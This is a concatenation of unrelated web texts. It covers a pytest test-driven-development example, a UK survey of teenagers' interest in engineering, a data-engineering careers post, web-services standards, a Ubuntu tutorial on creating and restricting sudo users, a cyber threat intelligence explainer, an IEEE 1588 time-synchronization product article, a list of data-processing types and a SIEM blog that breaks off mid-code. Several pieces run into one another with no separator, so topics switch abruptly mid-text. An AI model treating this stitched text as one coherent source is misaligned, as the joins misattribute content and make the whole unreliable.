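@pytest.mark.parametrize("raw,expected_seconds", CASES)
def test_parse_duration(raw, expected_seconds):
    assert parse_duration(raw) == expected_seconds

# Step 2: only now write the simplest implementation that makes the test pass.
def parse_duration(raw: str) -> int:
    """Convert strings like '90s', '2m', '1h' into a number of seconds."""
    units = {"s": 1, "m": 60, "h": 3600}
    return int(raw[:-1]) * units[raw[-1]]
```

Because the function is small and has its own dedicated, parameterized test, new cases (or new units such as days) can be added by extending the data table rather than writing new test code.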
These are some ideas to take into consideration during the design and development of tests in order to create a logical and robust testing infrastructure for your project. Lastly, if you have any questions around the advantages and design considerations of Test-Driven Development, please don’t hesitate to reach out to us at any time. We’d love to help you get started.
More than 80% of 16 to 17-year-olds are interested in technology, but only 21% are interested in an engineering career, according to research.
A study by the Queen Elizabeth Prize for Engineering (QEPrize) found 82% of 16 to 17-year-olds in the UK think engineering is integral to the future of technology innovation, but less than a quarter want to pursue it as a career.
“We need to do more to educate people on the role engineering plays in technology and help young people understand that technology is a product of engineering,” said Christopher Snowden, chairman of the QEPrize judging panel and vice-chancellor of the University of Southampton.
The research found teens would be more inspired to go into engineering if they could use it as an opportunity to change society. Some 36% of teens said their motivation for going into technology would be to create innovations that would make a difference to the world.
The 16 to 17-year-olds ranked helping society as a greater motivator to entering engineering than income levels or job security.
More than 70% claimed climate change and depleting energy resources would be concerns in the future, and felt engineering would be able to address these issues in the next 20 years.
Breaking down stereotypes
Science, technology, engineering and maths (Stem) subjects still have a reputation for being difficult, putting many potential candidates – especially girls – off entering the sector.
Almost a third of 16 to 17-year-olds claimed they felt a career in engineering would be too hard and they would be unable to gain funding for training.
Industry professionals claim the industry should work with schools and parents to break down these stereotypes and give children a better idea of what a Stem career entails.
“Our sector needs to work together to overcome some of the outdated stereotypes and old-fashioned notions that engineering isn’t a career suitable for women,” said Nigel Whitehead, group managing director at BAE Systems.
“We must do more to show all young people – and their parents – that engineering is a great career choice. We need to be bolder about the importance of Stem subjects,” he added.
According to the QEPrize report, UK teenagers show more interest in entering engineering fields (85%) than the global average (81%).
However, although UK teens showed more interest in Stem subjects than those in Germany, Japan and South Korea, they fell behind teens in all the other countries surveyed.
Skilled IT and Stem workers are in high demand in the UK, with more than 90% of firms claiming they are facing some sort of skills shortage.
Data engineering has never been more important or relevant than it is today. While many data engineering responsibilities were often handed to data scientists in the past, most data scientists are not experts at building the data infrastructure and pipelines needed to complete their work. Because of this, we’ve found that many data scientists prefer to exclude data engineering requirements from their job responsibilities altogether.
This post, which is an excerpt from our newly-released 2021 salary report for the data engineering field (which can be downloaded for free here), shares more about how this field has developed over the past few decades, and some of the criteria that Burtch Works uses to define data engineers.
The Evolution of Data Engineering
Many might say that data engineering as a profession has been around for well over a decade, or even several, since relational databases came to market led by major Original Equipment Manufacturers (OEMs) in the 1970s. These included Microsoft SQL Server, IBM DB2, and Oracle. However, the reality is that data engineering has evolved immensely since the early years with the onset of Big Data, digital transformation, and more sophisticated data science practices like machine learning and artificial intelligence.
Now data volumes, variety, and velocity are much greater than what they used to be, which has led data engineering professionals away from using traditional ETL tools to developing and adopting new tools and processes to handle the data revolution. These modern tools and responsibilities now support cloud computing, data infrastructure, data warehousing, data mining, data modeling, data crunching, metadata management, data testing, and governance, among others.
Defining Data Engineers
So how does Burtch Works define data engineers? We define data engineers as professionals who design and build systems for collecting, storing, and analyzing data at scale. They are also typically responsible for building data pipelines to bring together information from different source systems.
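To illustrate what “building a data pipeline” can mean at its simplest, here is a hedged sketch in Python that extracts rows from a CSV file, applies a light transformation, and loads the result into SQLite. The file name, columns, and table are hypothetical, and production pipelines typically run on much heavier tooling (Spark, Airflow, cloud warehouses).

```python
import csv
import sqlite3

def run_pipeline(csv_path: str = "orders.csv", db_path: str = "warehouse.db") -> None:
    """Tiny ETL job: extract from a source file, transform, load into a table."""
    # Extract: read the raw rows from the source system (a CSV file here)
    with open(csv_path, newline="") as f:
        rows = list(csv.DictReader(f))

    # Transform: normalize customer names and convert amounts to integer cents
    cleaned = [
        (row["order_id"], row["customer"].strip().lower(), int(float(row["amount"]) * 100))
        for row in rows
    ]

    # Load: write the cleaned records into the warehouse table
    with sqlite3.connect(db_path) as conn:
        conn.execute(
            "CREATE TABLE IF NOT EXISTS orders (order_id TEXT, customer TEXT, amount_cents INTEGER)"
        )
        conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", cleaned)

if __name__ == "__main__":
    run_pipeline()
```

The same extract/transform/load structure scales up to the distributed, scheduled pipelines that data engineers build with the tools listed below.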
Data Engineer Education Profile:
Data engineers typically hold a Bachelor’s or Master’s degree in Computer Science, Information Systems, or Computer Engineering. In the sample of data engineering professionals from our 2021 salary report, we found that the most common degree is a Master’s degree (62% of the sample), followed by Bachelor’s degrees (32%), while PhDs were rare (5%). For more about how this compares to data scientists, check out this post.
Data Engineer Tool Usage
Data engineering is a field with many tools, and it’s not uncommon to see a very extensive tool section on a resume or job description. There is no singular tool that makes someone a data engineer, and so we find that most data engineers will have a very broad set of experience with many tools, including many of the examples listed below:
- Programming: Python, PySpark, Scala, Java, SQL, Shell Scripting, or occasionally C++
- Cloud Computing: AWS (Redshift, EMR, EC2, Lambda, S3, etc.), Azure, or GCP (BigQuery)
- Relational Databases: SQL Server, Oracle, MySQL, Teradata
- NoSQL Databases: Cassandra, MongoDB, Neo4j
- Continuous integration/continuous deployment (CI/CD): Docker, Jenkins, Kubernetes
- Big Data technologies: Hadoop, HDFS, Hive, MapReduce, Spark, HBase
- Reporting: Tableau, PowerBI, and Looker
Typical Data Engineer Skills & Job Responsibilities
Data engineers often have a wide range of skills and work alongside data scientists to prepare data for analysis and put data products into production. For more about how data engineer vs. data scientist skills compare, see this post. Below are some examples of typical data engineer skills and responsibilities that we see:
- Building data pipelines and ETL or ELT
- Experience with complex distributed computing
- Ability to work with structured and unstructured data
- Deployment of data science models
- Experience with data science applications
- Experience with continuous integration working with Docker and Kubernetes
- Build and scale large batch data pipelines and real-time ETL pipelines
- Gather business requirements and implement data processes
- Design and support data lakes and data marts
- Work with data scientists to deploy machine learning models
- Troubleshoot models in a production environment to ensure accuracy
Typical Job Titles
There are a variety of different job titles and specializations within data engineering, and we’ve also seen a rise in hybrid-type roles that may lean further towards machine learning or DevOps. Below are just a few examples of data engineering job titles, but to learn more about specializations like BI Engineers, Computer Vision Engineers, or Data Architects, you can read this post.
- Data Engineer
- Big Data Engineer
- Data Science Engineer
- Cloud Engineer
- Cloud Data Engineer
- Principal Data Engineer
- Manager/Director, Data Engineering
- Head of Data Engineering/Architecture
Looking to the future, as more hiring and investment is allocated to building data teams, demand for data engineering is poised for significant growth and the field for continued innovation. There is a lot to learn about this growing field, so our hope is that this post can be a good foundational resource to learn more about who these professionals are and what they do.
Interested in our salary research on data engineers and data scientists? Download our studies using the button below. | <urn:uuid:3a4c89a7-0d5d-47b2-8d6c-5f45b1ae1e8b> | CC-MAIN-2022-40 | https://www.burtchworks.com/2021/10/11/rise-of-the-data-engineer-tools-skills-and-the-future-of-big-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00192.warc.gz | en | 0.935332 | 1,132 | 2.546875 | 3 |
An Eye on the Standards
While developing .Net and related products, Microsoft has scrupulously (for Microsoft, anyway) employed Web standards. Even if you are not planning to embrace .Net, it is important (and perhaps vital) to keep an eye on developments in:
- XML (Extensible Markup Language)
- UDDI (Universal Description, Discovery, and Integration)
- WSDL (Web Services Description Language)
- SOAP (Simple Object Access Protocol)
Some of these protocols have other uses, but for the next several years Web services will dominate much of their use and development. These standards are the reason people feel Web services have a much better chance for success than previous distributed application schemes (e.g., CORBA and DCOM). Adherence to standards will determine just how well Web services components can really interoperate.
Of the four standards, UDDI is a particularly important bellwether because it will be used to create Web services registries (directories). UDDI also specifies how a browser or server can go out on the Internet and locate a desired Web service from the registries. The contents of these registries, how they are reached, and how efficiently they lead to using a Web service will have a lot to do with the success of the Web services concept. | <urn:uuid:c98c2928-87c7-4bcb-bc27-a82234869c21> | CC-MAIN-2022-40 | https://cioupdate.com/navigating-the-waters-of-web-services-with-net/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00393.warc.gz | en | 0.931787 | 271 | 3.03125 | 3 |
You probably have heard of the concept “In Linux, everything is a file”. This sounds somewhat puzzling since the Linux system comprises various entities and not just files. We have directories, symbolic links, processes, pipes, and sockets just to mention a few. The oversimplification simply gives a high-level overview of the Linux architecture. It implies that in a Linux system, every single entity is considered a file. These entities are represented by a file descriptor which is a unique identifier for a file or other resources such as directories, network sockets, or processes – hence the concept “everything is a file”.
This oversimplification then leads us to the concept of file and directory permissions. By default, each file and directory in Linux has its own set of permissions. These permissions determine the access rights or privileges that users have on the file. If you own a file or a directory, you can pretty much do anything you want with it – you can access it, edit it, rename it, and even delete it.
But not all users are the same. One unique user in the Linux system is the root user. The root user is an administrative user with the highest privileges and is not bound by any permission restrictions. The user can do pretty much anything. This includes installing and uninstalling programs, accessing and modifying system files, and customizing the system. The root user can also break the system, whether intentionally or accidentally – which is why it’s not recommended to log in and run the system as the root user. It only takes one wrong command to crash the system. For this reason, it’s always recommended to run commands as a sudo user.
What is a sudo user?
Since administering the Linux system as the root user is highly discouraged, a system administrator needs to grant a regular user some level of privilege to execute some (or all) root commands.
Sudo is a program that grants regular users permissions to run commands with root privileges or as another user. A sudo user is, therefore, a regular Linux user with elevated privileges to run commands as a root user or another regular user, the default being the root user. In addition, you can configure sudo to restrict a sudo user to a handful of commands or allow them to run all commands as the root user. We will cover these scenarios in depth later on in this guide.
First, we will walk you through the creation of a sudo user on Ubuntu 20.04.
How to create a sudo user
To create a sudo user on Ubuntu 20.04, follow the steps outlined.
Step 1: Log in to your server
First, log in to your cloud server as the root user using the syntax shown.
$ ssh root@your_server_ip
Provide the root password when prompted and hit ENTER to gain access to the server. If you are using Putty, simply type in the IP address of the remote server and click the ‘Open’ button, or hit ENTER.
Step 2: Create a new user
Once logged in, create a new regular user using the adduser command. Here, jumpcloud is our new user.
# adduser jumpcloud
The command does a couple of things. First, it creates a new user and a primary group called jumpcloud, and then adds the user to that group. Next, a home directory for the user is created and configuration files are copied into it. Thereafter, you will be prompted to type in the new user's password. Be sure to provide a strong password and confirm it.
Once the user’s password is set, some additional information will be required of you. Fill in where necessary or leave it blank by hitting ENTER if the information is not applicable.
To confirm that the newly added user was created, view the /etc/passwd file using the cat command. This provides information such as the UID (User ID), GID (Group ID), and the path to the home directory.
# cat /etc/passwd | grep jumpcloud
Similarly, you can retrieve the user details using the id command as shown.
# id jumpcloud
Step 3: Add the new user to the sudo group
A sudo group is a group of superusers that have privileged access to root commands. With that in mind, proceed and add the new user to the sudo group using the usermod command as follows.
# usermod -aG sudo jumpcloud
To verify that the user has been added to the sudo group, use the id command again.
# id jumpcloud
From the output, we can see that the user now belongs to two groups: jumpcloud and sudo. Alternatively, you can run the groups command to display only the groups that the user belongs to.
# groups jumpcloud
Perfect! The new user is now a sudo user and has unrestricted access to root privileges.
Step 4: Test sudo
With the sudo user already in place, we are going to proceed and test the user. So, switch to the sudo user using the su command.
# su - jumpcloud
The command places you in the user's home directory. The syntax for using sudo is indicated below:
$ sudo command-to-be-executed
As an example, we are going to update the package lists of our system. So, invoke sudo followed by the command to be executed.
$ sudo apt update
When prompted, type in the password of the user and hit ENTER. The command will execute successfully – a confirmation that the user has successfully been added to the sudo group and can now perform elevated system tasks.
Understanding the sudoers file
The sudo user that we have created assumes all the rights and privileges of the root user and can run virtually any command. However, good practice recommends that you employ the least privilege principle. This is a security concept whereby a user is only assigned minimum access rights or permissions to perform their role. Therefore, as a systems administrator, you should only grant the necessary permissions to the sudo user to allow them to perform their roles.
The sudoers file /etc/sudoers spells out which users can run what commands on the system. It comprises a set of rules that govern which users or groups can run elevated tasks. To grant or restrict root privileges to users, you need to edit this file.
You should never edit the sudoers file using a normal text editor like nano or vim, as this could lead to a corrupted file which can potentially lock everyone out, including the admin. As such, the sudoers file should be edited by executing the visudo command as follows.
This opens the /etc/sudoers file using the nano editor as shown. All lines starting with a hash sign – # – are comments and do not have any effect or impact on the file.
By default, the file has 6 uncommented lines. Let’s skip to the user privilege line which is the fourth line.
root ALL=(ALL:ALL) ALL
- The first parameter points to the username – in this case root user.
- The first “ALL” indicates that the rule is applicable to all hosts.
- The second “ALL” indicates that the root user can run commands as any user.
- The third “ALL” indicates that the root user can run commands as any group.
- Finally, the last “ALL” indicates that the rules are applicable to all commands.
The next two lines define the sudo rules for groups. The “%” defines a group. Here, we have two groups that have been defined: admin and sudo groups.
The second line indicates that the admin group can run all commands as any user.
%admin ALL=(ALL) ALL
The third line indicates that the sudo user can run any command as any user and as any group.
%sudo ALL=(ALL:ALL) ALL
Editing the sudoers file directly is not recommended. Instead, it is preferred to place the associated sudo rules in the /etc/sudoers.d directory. This makes it easy for sysadmins to keep track of which rules apply to which user accounts. Files placed in this directory follow the same rules as the sudoers file.
How to restrict sudo users from executing certain commands
As we pointed out earlier, you might need to limit sudo users from running certain system commands. To accomplish this, you need to create a sudo rule in the /etc/sudoers.d directory.
For demonstration, we will create a rule file called jumpcloud which restricts the sudo user from upgrading packages to their latest versions.
# vim /etc/sudoers.d/jumpcloud
Next, add the restriction rule to the file and save the changes.
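The rule itself takes the following form (the /usr/bin/apt path is assumed here; confirm the path on your own system):
jumpcloud ALL=(ALL) ALL, !/usr/bin/apt upgrade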
The rule indicates that the jumpcloud user can execute all commands as the root user, with the exception of the apt upgrade command. Note that you need to provide the full path of the restricted command, prefixed by an exclamation mark.
To find the full path of a command, use the which command as shown.
$ which command
When the user tries to upgrade the packages, an error is splashed on the screen indicating that the user is not allowed to do so.
Where multiple commands are involved, list them in a single line separated by a comma. In the example below, the sudo user has been limited from shutting down and rebooting the system. Notably, there are multiple ways of shutting down or rebooting a Linux system, and the associated commands have been listed in a single line below.
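Assuming the standard Ubuntu 20.04 command paths, such a rule could look like this:
jumpcloud ALL=(ALL) ALL, !/usr/sbin/shutdown, !/usr/sbin/reboot, !/usr/sbin/poweroff, !/usr/sbin/halt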
Any attempt to power off or reboot the system by the user will be thwarted by the system.
How to run specific sudo commands without a password
Sometimes, you might need to run some commands without being prompted for a password. This is particularly helpful if you are running a script containing a sudo command.
To achieve this, use the directive NOPASSWD followed by the full path to the command. In the example below, the user can update the package lists without a password prompt.
jumpcloud ALL=(ALL) NOPASSWD: /usr/bin/apt update
Managing user privileges is usually one of the top-of-mind tasks that every system administrator has to undertake. Sudo privileges should only be granted to trusted users such as support or operation teams.
It’s always recommended to restrict sudo users to a subset of system commands. By doing so, you provide them with the basic privileges that they need to perform their roles. Unrestricted sudo access can be detrimental as this can lead to the sudo user performing some unauthorized operations which can wreak havoc on the system. Or worse, unrestricted sudo access privileges can make it that much easier for a malicious actor to take over the system.
That being said, managing the process to assign specific permissions to specific users can be overly time consuming and quickly overwhelm your priorities, especially if you are facing a growing environment and a growing team. JumpCloud’s Linux device management capabilities make it easier to manage sudo access across entire fleets through its user security settings and permissions. To see how this works, along with a number of other device security and management features, sign up for your free account today. JumpCloud is free to use for up to 10 users and 10 devices; we also provide 24×7 in-app support for the first 10 days of use. | <urn:uuid:b68319e1-0087-4a79-8ba3-0d4842db7af6> | CC-MAIN-2022-40 | https://jumpcloud.com/blog/how-to-create-a-new-sudo-user-manage-sudo-access-on-ubuntu-20-04 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00393.warc.gz | en | 0.922719 | 2,434 | 3.671875 | 4 |
Cyber threat intelligence is data that’s collected, processed and analysed to understand security risks.
The information can be used to determine threat actors’ motives, the information they might target and the actions they might take.
It’s a crucial weapon in organisations’ cyber defences, as it helps them respond to threats proactively. They can make informed decisions based on research and evidence, and implement measures to mitigate cyber security risks.
Why is cyber threat intelligence important?
One of the crucial elements of effective cyber security is speed. Cyber criminals are always looking for ways to identify and exploit vulnerabilities, and organisations must react quickly to close known weaknesses and spot errors before the crooks can pounce.
Cyber threat intelligence gives organisations an advantage over criminals in this conflict. The information they gather can help them anticipate threat actors’ moves and implement appropriate precautions.
The data gathered during intelligence finding can also reveal trends in cyber criminals’ techniques and tactics. This can help cyber security personnel prepare for future attacks and shift resources accordingly.
But cyber threat intelligence doesn’t only help security personnel understand what threat actors do; the information also provides insight into their decision-making process.
The benefits of cyber threat intelligence
Although cyber threat intelligence is often associated with large firms that have significant cyber security budgets, the system can help organisations of all sizes.
After all, every organisation is at risk of security incidents and would benefit from cyber security support.
For SMEs, cyber threat intelligence can help decision-makers prioritise their resources. Instead of relying on technologies, tools and processes that are applied based on general guidance, organisations can determine which defences are best suited for their needs.
Meanwhile, larger organisations can use cyber threat intelligence to support their existing security mechanisms. By leveraging external threat intelligence, they will reduce the need for additional internal security analysts.
Cyber threat intelligence lifecycle
The threat intelligence lifecycle is a process that transforms raw data into clear information that can be used to make decisions. It can take several forms, but it generally consists of six steps that are repeated to form a continual improvement process.
1. Determine your requirements
An organisation’s first task is to agree upon the goals of the cyber threat intelligence system. Your team might want to learn about the types of attackers that target your organisation, their motivation, the attack surface and the specific actions that should be taken to mitigate the risk.
Once these have been established, the organisation should create a methodology for implementing the system based on their available resources.
2. Collect the required information
The next step is to collect the necessary data to meet your requirements. This could mean gaining information from traffic logs, publicly available data sources, relevant forums and subject matter experts.
3. Process the information
After the data has been collected, it must be processed into a format suitable for analysis.
This usually means decrypting files, translating information from foreign sources, organising the data points in spreadsheets and evaluating the data for relevance and reliability.
4. Analyse the information
Once the dataset has been processed, the organisation must analyse the information to find answers to the questions posed in the requirements stage.
5. Present the results
The threat intelligence team must translate their analysis into a summary of findings. This is so that they can share their conclusions with senior decision-makers without relying on dense statistics or technical jargon.
6. Seek feedback
The final stage of the threat intelligence lifecycle is to receive feedback on the data that has been provided.
You might learn, for example, that the organisation has made organisational changes regarding cyber security, which will affect the way threat intelligence should be gathered, or that senior decision makers would prefer reports to be presented in a different way.
Preparing for cyber security incidents with GRCI Law
If you’re looking for guidance on how to prevent cyber security incidents, GRCI Law is here to help.
Our Cyber Incident Response Readiness Assessment provides an impartial review of your organisation’s ability to protect against, detect and respond to a cyber security incident.
The assessment looks at your organisation’s cyber incident response capabilities, threat and vulnerability management, event logging and monitoring, and business continuity.
We understand that no two organisations are the same and our consultancy team will work with you to ensure that we provide advice that is relevant to your organisation’s size, sector and objectives. | <urn:uuid:bffcf471-cc45-43f3-9ba7-fd6b4edf0ac9> | CC-MAIN-2022-40 | https://www.grcilaw.com/blog/what-is-cyber-threat-intelligence | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00393.warc.gz | en | 0.927133 | 906 | 2.859375 | 3 |
Network time-synchronization products from Symmetricom and Napatech keep time straight across Ethernet and Internet Protocol networks.
Coordinating accurate time across a network has always been a challenge. By the time it takes a data packet with the current time to go from a time server to a client requesting the time, hundreds of milliseconds may have elapsed.
Compounding the problem is that the packet may or may not experience queuing delays of indeterminate lengths as it moves across the switches, routers and other gear in between the source and the destination.
The good news is that in most cases, the Network Time Protocol (NTP) can be used to keep time straight, thanks to various offset mechanisms built into the standard that take network jitter and delay into account. However, in some cases truly exact time measurement is needed, down to the sub-millisecond level. For those duties, system builders should look at the Institute of Electrical and Electronics Engineers' IEEE 1588 precision clock synchronization protocol.
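As a rough sketch of how those offset mechanisms work (with hypothetical timestamps, shown here in Python for clarity), NTP records four timestamps per exchange and assumes the network path is symmetric:

# Hypothetical timestamps, in seconds, from one NTP request/response exchange.
t0 = 100.000  # client transmits the request
t1 = 100.120  # server receives the request
t2 = 100.121  # server transmits the reply
t3 = 100.240  # client receives the reply

# Assuming a symmetric path, the network delay cancels out of the offset estimate.
offset = ((t1 - t0) + (t2 - t3)) / 2  # estimated client clock error: 0.0005 s
delay = (t3 - t0) - (t2 - t1)         # round-trip network delay: 0.239 s
print(offset, delay)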
"NTP can exchange time stamps about once every 16 seconds, which means the accuracy which we typically derive [from NTP] is about a millisecond," said Paul Skoog, product marketing manager at the Timing, Test and Measurement Division of Symmetricom. "If you have to have to have better than a millisecond, that's when we start talking 1588."
A company that specializes in network time-synchronization products, Symmetricom offers a range of hardware that works with 1588, including dedicated time servers and switches that can maintain the integrity of time packets.
Most recently, the company has released version 4.0 of TimePictra, a package of hardware components that can synchronize time across an Ethernet or Internet Protocol network using IEEE 1588. With this package, a node manager maintains the correct time, which it communicates to remote clients at the edges of the network at regular intervals. The company has also released the latest version of its Grandmaster Clock, which features a dedicated 1588 time stamp processor.
The labs of Hewlett-Packard Co. originated IEEE 1588 as a way of synchronizing test and measurement equipment over a network, Skoog said. The chief difference between IEEE 1588 and NTP is that with NTP, the time is generated and adjusted entirely in software, while IEEE 1588 uses the underlying hardware as a reference, meaning the time is based on the frequency oscillations of the underlying circuitry. This approach allows time to be measured in roughly 60-nanosecond intervals (a nanosecond is 0.000001 milliseconds).
Symmetricom has a number of white papers that explain the internal workings of 1588 in more detail. To download them, visit this page.
Although NTP can handle most synchronization needs in government, there are a number of cases where more exact measurement does come in handy. Military sensor networks, for instance. A testing range may want to carefully document how some explosives detonate, or how quickly an aircraft moves. A testing range could be instrumented with hundreds of sensors to capture data from tests. Coordinating the resulting data would require extremely precise measurement. GPS devices could also provide sub-millisecond accuracy, but pairing GPS devices to each sensor would be prohibitively expensive.
Telecommunication companies are the biggest buyers of 1588-based products. As telcos move to Internet Protocol networks, they lose the built-in time synchronization of circuit networks. A base station cell tower, for instance, may be directly connected to an Ethernet network, rather than to a T-1 line, and would still require a timing source. Using 1588-based synchronization platforms keeps the telco's networks all on the same clock.
Symmetricom is not alone in releasing new 1588 products. Napatech has updated its round of 1 Gigabit and 10 Gb Ethernet adapters to be synchronized via 1588. Napatech is pitching these adapters for use in network performance monitoring, test and measurement, and traffic optimization.
- What is Data Processing?
- Stages of the Data Processing Cycle
- 7 Types of Data Processing based on What needs to be captured
- Conclusion
What is Data Processing?
Data processing refers to converting raw data into meaningful, machine-readable information. Thus, data processing involves collecting, recording, organizing, storing, and adapting or altering raw data to turn it into useful information.
Stages of the Data Processing Cycle
The data processing cycle consists of the steps needed to convert your raw data into actionable and meaningful information. Generally, the cycle consists of the following six stages.
- Data collection
- Data preparation
- Data input
- Data Processing
- Data output
- Data storage
7 Types of Data Processing based on What needs to be captured
The types of data processing have grown phenomenally with rising demands, evolving from manual data processing to automation.
Let's dive into the seven types of data processing techniques, which depend on what information needs to be captured and how soon you need it.
- Manual Data Processing
- Mechanical Data Processing
- Electronic Data Processing
- Batch Data Processing
- Real-time Data Processing
- Online Data Processing
- Automatic Data Processing
1. Manual Data Processing
The manual data processing method is one where data entry specialists record and process data by hand, using ledgers, paper record systems, and other manual processes. Though it is one of the earliest data processing methods, manual data entry is costly, time-consuming, error-prone, and labor-intensive.
For instance, imagine a company where employee entry is permitted only by signing a ledger instead of today’s access cards.
2. Mechanical Data Processing
Mechanical data processing processes data through mechanical devices such as typewriters, mechanical printers, and other devices. Although faster than the manual data processing method, it began to fade away as newer technologies evolved.
3. Electronic Data Processing
In the 1980s, with the rise of computers, electronic data processing (EDP) took hold. In EDP, the computer seamlessly processes the data automatically using pre-defined instructions from data specialists.
For instance, the use of spreadsheets to record student marks was prevalent during this time.
Though this data processing method is accurate, reliable, and faster than its predecessor, it still required data specialists for manual data entry and calculations.
4. Batch Data Processing
Batch data processing processes data by applying actions to multiple data sets through a single command. For example, in spreadsheets, data entry specialists can enter a formula for a single cell and apply it to the whole column. This type of data processing accelerates processing time and can complete a series of tasks without human intervention.
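A minimal Python sketch of that idea (the records below are made up) applies one operation to a whole batch of records at once instead of entering results one by one:

# Hypothetical batch of raw exam scores out of 50.
records = [
    {"student": "A", "raw": 42},
    {"student": "B", "raw": 37},
    {"student": "C", "raw": 49},
]

# One batch step converts every record to a percentage in a single pass.
processed = [{**row, "percent": round(row["raw"] / 50 * 100, 1)} for row in records]

for row in processed:
    print(row["student"], row["percent"])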
5. Real-time Data Processing
Real-time processing came into existence with the advent of the internet. By utilizing the internet, this processing method receives and processes data at the same time. Simply put, it captures data in real-time and generates quick or automatic reports. Hence this is one of the fastest data processing methods.
For example, take GPS tracking systems where sensors detect heavy traffic and give input on a real-time basis. Though the process saves time and labor, it is expensive and requires heavy maintenance.
6. Online Data Processing
Online data processing is often confused with real-time data processing; both receive and process data simultaneously, but with online processing, the user can extract data anytime, anywhere. The bar code system is the best example of online processing. When a book is bought in a bookstore, scanning its bar code automatically updates the book's record as sold. Another concrete example is access cards.
7. Automatic Data Processing
Today's millennials are entering a new age of data processing with the arrival of artificial intelligence. No other method can match it: data processing with no human intervention, real-time data entry, and results that are error-free and secure.
To illustrate this type of data processing, consider the automation of billions and billions of invoices in the logistics sector. It not only reduces the grunt work but also frees teams to focus on higher-value work.
From the above overview of data processing methods, it is no surprise organizations find automatic data processing as the best fit. But not all organizations have joined the AI bandwagon!
Now is always the best time to act!
With a proven track record of delivering personalized services, iTech, as a data outsourcing partner with a constant focus on innovation, has added automation services to its arsenal to aid the customers in today’s digital arena.
Our automation services include SAP robot process automation, OCR/ICR services, ML-based data entry services, and more. Let us e-meet to talk more.
Reach out to our team today! | <urn:uuid:1d680e8e-6898-48da-abf6-4f7be5cffe09> | CC-MAIN-2022-40 | https://itechdata.ai/types-of-data-processing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00393.warc.gz | en | 0.898731 | 1,060 | 3.53125 | 4 |
An SIEM is critical to your Cybersecurity planning. Why? It turns out there are many ways to secure an organization's network, but can you depend on any of them to be 100% reliable? The answer is no. Zero-Day exploits, fileless malware, Phishing, Social Engineering, Brute Force Attacks, lost or stolen mobile devices...all of these can be the one opportunity that a cyber-hacker needs to gain access to your network, exfiltrate your most sensitive data, and hold your business ransom for hundreds of thousands, if not millions, of dollars.
But how can you know where the attack will come from, the multiple resources that are being attacked, and how to defend against the attack? It turns out that Cybersecurity, just like ogres and onions, has layers. More accurately, Cybersecurity has a framework which, when used properly, can help to defend organizations from a Cybersecurity attack. The reason for the framework is so that if one of the elements fails, the organization has additional systems ready to help defend the organization.
Physical Security As A Model For Cybersecurity
If you were looking to secure your physical office space, you would most certainly first focus on putting keyed locks on the doors. You might also add deadbolts that use a different key, or keycard security, or maybe even a digital keypad with an access code. But doors are not the only way into your building, so you’d probably want bars on the windows and reinforced glass. And just in case anyone were to get through that security, you would of course want an alarm system so that you’re notified of the intrusion. Is that enough? Probably not, and so you’d want to install video surveillance both inside and outside your building so you can see who is trying to get in...or who might have already gained access.
You protect the doors and windows because those are ways people might get in. You add an alarm system to notify you if there’s a breach, and you have video surveillance so you can see what actually happened. Each of these layers of security plays its own role in protecting your physical business. And layers of Cybersecurity help to protect your network, your data, and your entire business.
NIST Cybersecurity Framework
The most common Cybersecurity framework was developed by the NIST (National Institute of Standards and Technology), a department of the Federal Government, and contains five different layers to help organizations protect themselves from cyber attacks. Those layers are:
- Identify -- Know what it is you are protecting, the assets you have available, and the risks you face.
- Protect -- Security, Access Control, Protection and Education to keep your business safe.
- Detect -- Monitor everything, know what’s normal and what’s not normal.
- Respond -- How to figure out what happened, how to reduce the damage.
- Recover -- Recovering from the breach, improving your systems for next time, and communicating with interested parties.
Of course, this is a greatly simplified view. The NIST cybersecurity framework actually has 108 subcategories of recommended activities. The problem is that many businesses focus on the Protection activities to the exclusion of most of the others. That is why they will install strong password policies, strong antivirus, end-point protection, sandboxing of all web links, firewalls to block entry to the network, and VPNs to make communicating from or to the outside more secure.
Those are all good and necessary parts of a Cybersecurity strategy, but they aren’t enough on their own. Just as an organization needs alarms and video surveillance, an SIEM is critical to an organization’s Cybersecurity plan.
Why an SIEM is Critical To Your Cybersecurity Framework
Detection is a critical activity of any Cybersecurity strategy, which is why every quality Protection strategy is going to also provide strong, secure and detailed logging of all activities.
- Workstations will keep logs of every time a user logs in or runs an application.
- Networks will monitor and log all traffic that runs across them, including each file accessed and message exchanged.
- Firewalls will keep logs of all traffic going through its systems and attacks it has defended against.
- Virtual Private Networks (VPNs), which are designed to secure traffic from one endpoint to another, will similarly keep track of logins and traffic.
...and so on for all of your quality IT infrastructure systems.
Logging is critical for detection activities, but the problem with all of these logs is that they are all separate and independent logs...and they are HUGE if they are doing their job. They are individual silos of data that on their own cannot tell you all that you need to know. But if they are monitored and mined properly, they can reveal critical insights and information about the health of a network, the attacks that are attempting to breach it, whether they were successful or not, and the damage they might have done.
An SIEM is critical because it correlates the data from all of your logging activities in order to provide real information about the health and activities of your network and its security.
The vast majority of the data contained in your logs are going to be for legitimate traffic and activities. The most dangerous and threatening activities are going to be few and far between. But they will leave a trail...think of them as dots along a path...that the SIEM will link together to paint you a picture of what’s going on in your network.
An Illustrated SIEM Example
So how can an SIEM be critical to your organization’s Cybersecurity in real terms? Imagine for a moment that Bob is on a business trip to New York. He logs into the network via his VPN access minutes before his big presentation. Moments before, he logged in from someone else’s workstation within the facility. Worse yet, he is at the same time downloading intellectual property data from the branch office in Houston.
None of those activities on their own might be flagged as malicious, but an SIEM would coordinate and contextualize all of this logged data from the VPN, the internal network, the HR system and other systems and conclude that there is an access problem and that an attack is underway.
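A toy version of that correlation logic, written as a Python sketch with made-up log records and field names, might look like this:

from datetime import datetime, timedelta

# Hypothetical, already-parsed events pulled from separate logs
# (VPN concentrator, workstation logins, branch file server).
events = [
    {"user": "bob", "source": "vpn", "location": "New York", "time": datetime(2020, 7, 1, 9, 0)},
    {"user": "bob", "source": "workstation", "location": "headquarters", "time": datetime(2020, 7, 1, 9, 1)},
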